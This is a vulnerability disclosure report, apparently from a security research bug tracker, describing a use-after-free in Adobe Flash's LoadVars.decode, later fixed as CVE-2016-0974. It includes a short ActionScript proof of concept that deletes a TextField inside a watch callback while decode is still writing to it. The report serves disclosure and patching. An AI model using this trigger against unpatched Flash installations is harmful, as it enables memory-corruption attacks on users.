Status: Fixed
Closed: Feb 2016
Adobe Flash: Use-after-free in LoadVars.decode
Project Member Reported by natashenka@google.com, Dec 7 2015
There is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:

// Borrow LoadVars.decode so it can be invoked with a TextField as "this"
var lv = new LoadVars();
var f = lv.decode;
var tf = this.createTextField("tf", 1, 2, 3, 4, 5);
tf.natalie = "not test";
// func runs when decode assigns tf.natalie; it removes the TextField,
// freeing the object that decode is still writing into
tf.watch("natalie", func);
f.call(tf, "natalie=test&bob=1");
trace(tf.natalie);

function func() {
	trace("here");
	tf.removeTextField();
	return "test";
}

A sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Ubuntu.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Attachments:
lv.swf (743 bytes)
lv.fla (4.7 KB)
Project Member Comment 1 by natashenka@google.com, Feb 17 2016
Labels: -Restrict-View-Commit CVE-2016-0974
Status: Fixed
Fixed in Feb update